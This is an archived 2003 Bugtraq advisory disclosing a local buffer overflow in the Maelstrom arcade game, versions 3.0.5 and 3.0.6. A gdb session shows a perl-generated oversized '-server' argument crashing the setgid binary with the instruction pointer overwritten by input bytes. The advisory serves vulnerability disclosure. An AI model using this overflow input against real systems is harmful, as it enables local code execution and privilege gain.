[30175] in bugtraq

home help back first fref pref prev next nref lref last post

Maelstrom Buffer Overflow

daemon@ATHENA.MIT.EDU (Luca Ercoli)
Mon May 19 17:09:28 2003

Date: 18 May 2003 13:52:04 -0000
Message-ID: <20030518135204.12743.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Luca Ercoli <luca.ercoli@inwind.it>
To: bugtraq@securityfocus.com



Maelstrom is an arcade game. There is a buffer overflow vulnerability in 
Maelstrom which allow local attacker 
arbitrary code execution.

Vulnerable systems: Maelstrom 3.0.6
		    Maelstrom 3.0.5

Example:
 
[lucae@linux]$ gdb /usr/bin/Maelstrom 

GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you 
are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...

(gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`
(gdb) r

Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD" x 
9999'`
Couldn't resolve host name for ABCDABC......ABCD

Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()

(gdb) Quit



Note: -rwxr-sr-x    1 root     games      171568 19 feb 
03:38 /usr/bin/Maelstrom   in Linux Professional 9.0



Luca Ercoli luca.ercoli@inwind.it

home help back first fref pref prev next nref lref last post